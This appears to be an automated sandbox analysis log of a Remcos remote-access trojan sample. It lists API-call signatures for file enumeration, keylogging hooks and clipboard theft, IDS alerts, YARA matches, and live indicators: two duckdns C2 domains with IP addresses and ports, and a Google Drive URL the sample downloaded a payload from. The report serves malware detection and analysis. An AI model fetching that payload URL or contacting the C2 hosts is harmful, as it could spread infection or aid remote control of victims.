Source: Binary string: ping.pdbGCTL; source: esentutl.exe, 00000004.00000003.1766895449.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000B.00000002.1870542553.0000000000D11000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.4.dr
Source: Binary string: easinvoker.pdbH; source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL; source: AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782458415.000000000238F000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5CA000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E668000.00000004.00000020.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E63F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdb; source: alpha.pif, alpha.pif, 0000000A.00000000.1777848027.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000D.00000000.1873419118.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000E.00000002.1875239143.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1876616016.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.3.dr
Source: Binary string: ping.pdb; source: esentutl.exe, 00000004.00000003.1766895449.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000B.00000002.1870542553.0000000000D11000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.4.dr
Source: C:\Users\user\Desktop\AWkpqJMxci.exe; Code function: 0_2_02885908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02885908
Source: C:\Users\Public\alpha.pif; Code function: 5_2_00B10207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,5_2_00B10207
Source: C:\Users\Public\alpha.pif; Code function: 5_2_00B1589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,5_2_00B1589A
Source: C:\Users\Public\alpha.pif; Code function: 5_2_00B14EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00B14EC1
Source: C:\Users\Public\alpha.pif; Code function: 5_2_00B23E66 FindFirstFileW,FindNextFileW,FindClose,5_2_00B23E66
Source: C:\Users\Public\alpha.pif; Code function: 5_2_00B0532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,5_2_00B0532E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046696A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_046696A0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0466928E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0467C322
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0466C388
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0466BD72
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667877 FindFirstFileW,FindNextFileW,8_2_04667877
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04668847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_04668847
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0466BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04679B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_04679B86
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B1589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,10_2_00B1589A
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B10207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,10_2_00B10207
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B14EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B23E66 FindFirstFileW,FindNextFileW,FindClose,10_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B0532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,10_2_00B0532E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040928E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C322
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C388
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004096A0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00408847
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00407877 FindFirstFileW,FindNextFileW,17_2_00407877
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB6B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419B86
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD72
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05128592 FindFirstFileW,FindNextFileW,17_2_05128592
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512A3BB __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0512A3BB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512C886 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0512C886
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513A8A1 FindFirstFileW,17_2_0513A8A1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512CA8D FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0512CA8D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05129562 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_05129562
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513D03D FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0513D03D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512D0A3 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0512D0A3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05129FA9 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_05129FA9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_04667CD2

Networking

Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49732 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49733 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49740 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49743 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49742 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49744 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49741 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49769 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49763 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49806 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49831 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49837 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49800 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49868 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49862 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49900 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49933 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49927 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49961 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49994 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49967 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50001 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49894 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50031 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50032 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50033 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50035 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50030 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50027 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50037 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50034 -> 162.216.243.15:2404
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50029 -> 192.169.69.26:2500
Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50036 -> 162.216.243.15:2404
Source: Malware configuration extractor URLs: https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0
Source: Malware configuration extractor URLs: ogcmaw.duckdns.org
Source: Malware configuration extractor URLs: emberluck.duckdns.org
Source: unknown DNS query: name: ogcmaw.duckdns.org
Source: unknown DNS query: name: emberluck.duckdns.org
Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0289E4B8 InternetCheckConnectionA,0_2_0289E4B8
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 162.216.243.15:2404
Source: Joe Sandbox View IP Address: 192.169.69.26 192.169.69.26
Source: Joe Sandbox View ASN Name: WOWUS WOWUS
Source: Joe Sandbox View ASN Name: DYNUUS DYNUUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 142.250.181.33:443
Source: global traffic HTTP traffic detected: GET /download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_04664B96 WaitForSingleObject,SetEvent,recv,8_2_04664B96
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: ogcmaw.duckdns.org
Source: global traffic DNS traffic detected: DNS query: emberluck.duckdns.org
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe, SndVol.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: AWkpqJMxci.exe, AWkpqJMxci.exe, 00000000.00000002.1805021411.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.0000000000785000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D65F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0
Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.00000000007A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0?
Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.00000000007AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0x
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0466A2F3 SetWindowsHookExA 0000000D,0466A2DF,00000000,8_2_0466A2F3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0466B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0466B749
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_046768FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_046768FC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 17_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004168FC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 17_2_05137617 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_05137617
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0466A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_0466A41B
Source: Yara match File source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
